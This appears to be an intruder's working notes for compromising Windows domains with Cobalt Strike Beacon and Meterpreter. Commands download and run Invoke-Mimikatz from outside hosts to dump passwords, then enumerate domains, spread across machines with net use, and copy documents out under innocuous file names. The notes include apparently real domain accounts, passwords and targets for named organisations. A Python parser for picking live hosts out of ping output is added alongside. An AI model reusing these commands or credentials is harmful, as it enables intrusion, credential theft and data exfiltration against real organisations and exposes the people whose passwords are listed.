PowerShell execution
Windows command: wmic
http://carnal0wnage.attackresearch.com/2013/10/dumping-domains-worth-of-passwords-with.html
Command: this dumps passwords
The PowerShell script is https://github.com/clymb3r/PowerShell/blob/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1
1) In Beacon or Meterpreter, run getsystem first
2) wmic process call create "powershell \"IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds\" >d:\2.txt"
The dump written to 2.txt contains the passwords directly. (Win32_Process.Create does not go through cmd.exe, so the > here is left to powershell.exe, which takes it as part of its command string; if 2.txt comes back empty, wrap the whole thing in cmd /c as in the later example so that cmd.exe performs the redirect.)
Set a Linux console shortcut. Command: gnome-terminal
Start the Kali service first: System Services -> start metasploit
Download Cobalt Strike: http://www.advancedpentest.com/download
The net view command lists all shared resources on a remote host. Syntax: net view \\<IP address>
net view /domain  lists the domains visible on the network (not domain accounts; those come from net user /domain)
net view /domain:JINDALSTEEL  lists the hosts in that domain
net view /domain:JINDAL.AFRICA
whoami /groups  shows the groups the current token belongs to (not the accounts in a group); not useful here
net user /domain  lists the accounts in the domain; not useful here
net group /domain  lists the groups in the domain; not useful here
net group "domain admins" /domain  lists the members of the group found above; not useful here
shell cmd /c for %a in (WIN-DC,WIN-WALKER) do ping -n 1 %a >> info2.txt   check which hosts are alive
shell cmd /c for /f %a in (info.txt) do ping -n 1 %a >> zend.txt   same, reading the host names from info.txt (one per line)
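Once a few dozen hosts have been pinged into zend.txt, the live ones have to be picked out of the log. The following Python parser is an added example, not part of the original notes; the ping log it reads is constructed (made-up names and addresses) to cover the outcomes Windows ping produces, including the "Destination host unreachable" reply from a gateway that a naive grep for "Reply from" would count as a live host.

```python
import re

# Constructed sample of what `ping -n 1 %a >> zend.txt` leaves in the log for
# four targets: a host that answers, a host that times out, an IP where only
# the gateway answers "Destination host unreachable", and a name that does
# not resolve. Made-up names and addresses, used only to exercise the parser.
SAMPLE_PING_LOG = """\

Pinging WIN-DC [10.36.68.211] with 32 bytes of data:
Reply from 10.36.68.211: bytes=32 time<1ms TTL=128

Ping statistics for 10.36.68.211:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

Pinging WIN-WALKER [10.36.68.227] with 32 bytes of data:
Request timed out.

Ping statistics for 10.36.68.227:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),

Pinging 10.36.68.250 with 32 bytes of data:
Reply from 10.36.68.1: Destination host unreachable.

Ping statistics for 10.36.68.250:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Ping request could not find host WIN-GHOST. Please check the name and try again.
"""

# "Pinging NAME [IP] with 32 bytes" when a name was given, "Pinging IP with ..." when not.
HEADER_RE = re.compile(r"^Pinging (\S+?)(?: \[(\d+\.\d+\.\d+\.\d+)\])? with \d+ bytes of data:")
# A real echo reply carries "bytes=..."; "Destination host unreachable" notices do not.
REPLY_RE = re.compile(r"^Reply from (\d+\.\d+\.\d+\.\d+): bytes=\d+ ")
NOTFOUND_RE = re.compile(r"^Ping request could not find host (\S+)\.")


def parse_ping_log(text):
    """Map each target in a concatenated Windows ping log to {'ip', 'alive'}."""
    results = {}
    current = None
    for line in text.splitlines():
        m = HEADER_RE.match(line)
        if m:
            name, ip = m.group(1), m.group(2) or m.group(1)
            current = name
            results[name] = {"ip": ip, "alive": False}
            continue
        m = NOTFOUND_RE.match(line)
        if m:
            results[m.group(1)] = {"ip": None, "alive": False}
            current = None
            continue
        m = REPLY_RE.match(line)
        if m and current is not None and m.group(1) == results[current]["ip"]:
            # Count the host as up only when the echo reply comes from the
            # target itself, not from a router answering on its behalf.
            results[current]["alive"] = True
    return results


def live_hosts(text):
    """Names (as written in info.txt) of the targets that answered."""
    return sorted(name for name, r in parse_ping_log(text).items() if r["alive"])


if __name__ == "__main__":
    for name, r in parse_ping_log(SAMPLE_PING_LOG).items():
        print(f"{name:<14} {r['ip'] or '-':<15} {'up' if r['alive'] else 'down'}")
    print("live:", ", ".join(live_hosts(SAMPLE_PING_LOG)))
```

Feed it the downloaded zend.txt (open(...).read()) and the output of live_hosts() is the list to paste into the net use loop further down. Note that the "Packets: Received = 1" line cannot be trusted for the unreachable case, which is why the parser keys on the echo reply itself.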
ps  list processes; steal_token <pid>  take the token of a SYSTEM process to get SYSTEM privileges
The net use command maps a share on a remote host to a local drive letter for convenience. Syntax: net use <drive letter>: \\<IP address>\<sharename>
net use Z: \\192.168.10.210\nero
net use \\<ip or hostname>\c$ <domain account password> /u:<domain>\<domain account>
cmd /c for %a in (10.36.68.211,10.36.68.227,10.36.68.195,10.36.68.197,10.36.68.201,10.36.68.217) do net use \\%a jspl@BHARAT /u:jindalggn\root >> use.txt   (jspl@BHARAT is the password, jindalggn\root the domain account; results are appended to use.txt)
dir \\10.36.68.227\c$ and dir "\\10.36.68.227\c$\Documents and Settings"   reveals a profile for the account jspladmin on that machine
net user jspladmin /domain   look that account up in the domain
net use \\10.36.68.195 /del
net use \\10.36.68.195 Jin786Dal /u:jindalggn\jspladmin
dir "\\10.36.68.195\c$\Documents and settings\jspladmin\my documents"
net view \\10.36.68.211   list its shares, then browse them
dir \\10.36.68.211\NASUtils
dir "\\10.36.68.211\work_station"
download "\\10.36.68.221\work_station\Block-IX .pptx"   (the path contains a space, so quote it)
copy "\\10.36.68.221\work_station\Block-IX .pptx" c:\windows\temp\wahaha.log   copy it locally under an innocuous name, then
download wahaha.log
net time \\127.0.0.1   show the time on the local box
net use   with no arguments, list the current connections
Port scanning from Meterpreter:
run autoroute -s x.x.x.0/24
background
use auxiliary/scanner/portscan/tcp
set threads 50
set ports 80,8080,21,22,23,445,443,3389
exploit
Scheduled task:
at \\x.x.x.x 10:11 c:\xxx.exe
Windows Server 2003 has no PowerShell by default
cmd /c powershell "IEX (New-Object Net.WebClient).DownloadString('http://107.170.234.111:80/download/index.ps1'); Invoke-Mimikatz -Command \"privilege::debug sekurlsa::logonpasswords\"" > c:\3.txt
Excerpt of the resulting 3.txt:
* Username : Administrator
* Domain : TAIHE.COM
* Password : Domainadmin!@#
When the target cannot reach the internet, upload the .ps1 and load it locally instead:
powershell "IEX (New-Object Net.WebClient).DownloadString('c:/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" >c:\2.txt
(WebClient accepts a local path here because it turns the string into a file:// URI, so no web server is needed.)
etherape   for traffic monitoring